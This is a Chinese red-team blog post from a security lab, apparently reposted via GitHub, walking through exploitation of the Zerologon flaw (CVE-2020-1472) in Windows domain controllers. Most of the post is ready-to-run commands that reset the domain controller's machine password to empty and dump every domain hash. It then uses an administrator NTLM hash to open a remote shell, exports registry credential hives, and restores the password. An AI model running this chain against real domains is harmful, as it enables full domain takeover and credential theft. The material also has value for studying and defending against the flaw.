Skip to content

Latest commit

 

History

History
259 lines (123 loc) · 6.39 KB

[宸极实验室]-2021-8-10-『红蓝对抗』域内大杀器之CVE-2020-1472.md

File metadata and controls

259 lines (123 loc) · 6.39 KB

『红蓝对抗』域内大杀器之CVE-2020-1472

原创 pbfochk 宸极实验室

宸极实验室

微信号 ChenJiLab

功能介绍 『宸极实验室』隶属山东九州信泰信息科技股份有限公司,是山东省发改委认定的“网络安全对抗关键技术山东省工程实验室”。实验室圆满完成了多次国家级、省部级重要网络安全保障和攻防演习活动,并积极参加各类网络安全竞赛,屡获殊荣。

__

收录于话题

#红蓝对抗

12个

点击蓝字 | 关注我们

宸极实验室

日期:2021-08-10

作者:pbfochk

介绍:CVE-2020-1472 的漏洞利用。

0x00 前言

CVE-2020-1472Windows域控中严重的远程权限提升漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。目标机器系统版本如果在影响范围内,只要与目标机器可以进行网络连接即可在短时间内控制域控主机,影响较大,CVSS评分10.0

影响版本

 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Windows Server 2012Windows Server 2012 (Server Core installation)Windows Server 2012 R2Windows Server 2012 R2 (Server Core installation)Windows Server 2016Windows Server 2016 (Server Core installation)Windows Server 2019Windows Server 2019 (Server Core installation)Windows Server, version 1903 (Server Core installation)Windows Server, version 1909 (Server Core installation)Windows Server, version 2004 (Server Core installation)

0x01 攻击流程

1.1 安装impacket

首先安装impacket网络协议工具包。 impacket网络协议工具包: https://github.com/SecureAuthCorp/impacket

1.2 POC测试

POC脚本地址: https://github.com/SecuraBV/CVE-2020-1472

POC测试目标漏洞是否存在:

python zerologon_tester.py DC 192.168.31.240

1.3 EXP置空密码

EXP脚本地址: https://github.com/risksense/zerologon

 python set_empty_pw.py DC 192.168.31.240

1.4 获取域内hash

置空密码后获取目标域内所有hash

python secretsdump.py seep.cc/DC\$@192.168.31.240 -no-pass

获取到域控administratorhash,可解密得到明文密码后直接RDP,解密失败也可使用wmiexecpsexec等传递hash执行cmd

域控密码已被置空。

1.5 利用hash获取shell

使用impacket包内的wmiexec直接获取域控shell

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:7782c491c3a02792f0e86319b29e7a24 Administrator@192.168.31.240

0x02 密码恢复

目标机器hash长时间为空密码会导致脱域,对域环境产生重大影响,所以在拿到权限后需尽快恢复hash

2.1 获取原密码hash

获取目标机器shell后,在cmd中执行或者上线CS后执行命令并下载文件到本地。

reg save HKLM\SYSTEM system.savereg save HKLM\SAM sam.savereg save HKLM\SECURITY security.saveget system.saveget sam.saveget security.savedel /f system.savedel /f sam.savedel /f security.save

获取到本地后利用secretsdump解析原hash

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

2.2 恢复hash

获取原hash后还原:

python3 reinstall_original_pw.py DC 192.168.31.240 aecc311d1181efcde6ff2f744b3060d8

查询域控hash是否还原成功:

secretsdump.py seep.cc/administrator:dcadmin@123@192.168.31.240 -just-dc-user 'DC$'

0x03 总结

此漏洞只要与目标机器建立网络连接便可进行漏洞利用,在域环境内可以造成域控沦陷等严重后果。

参考链接

_https://www.jianshu.com/p/525be0335404 _

https://www.cnblogs.com/Mikasa-Ackerman/p/CVE20201472.html

免责声明:本文仅供安全研究与讨论之用,严禁用于非法用途,违者后果自负。

宸极实验室

宸极实验室隶属山东九州信泰信息科技股份有限公司,致力于网络安全对抗技术研究,是山东省发改委认定的“网络安全对抗关键技术山东省工程实验室”。团队成员专注于 Web 安全、移动安全、红蓝对抗等领域,善于利用黑客视角发现和解决网络安全问题。

团队自成立以来,圆满完成了多次国家级、省部级重要网络安全保障和攻防演习活动,并积极参加各类网络安全竞赛,屡获殊荣。

对信息安全感兴趣的小伙伴欢迎加入宸极实验室,关注公众号,回复『招聘』,获取联系方式。

预览时标签不可点

收录于话题 #

个 __

上一篇 下一篇

阅读

分享 收藏

赞 在看

____已同步到看一看写下你的想法

前往“发现”-“看一看”浏览“朋友在看”

前往看一看

看一看入口已关闭

在“设置”-“通用”-“发现页管理”打开“看一看”入口

我知道了

__

已发送

取消 __

发送到看一看

发送

『红蓝对抗』域内大杀器之CVE-2020-1472

最多200字,当前共字

__

发送中

写下你的留言

微信扫一扫
关注该公众号

微信扫一扫
使用小程序

取消 允许

取消 允许

知道了

长按识别前往小程序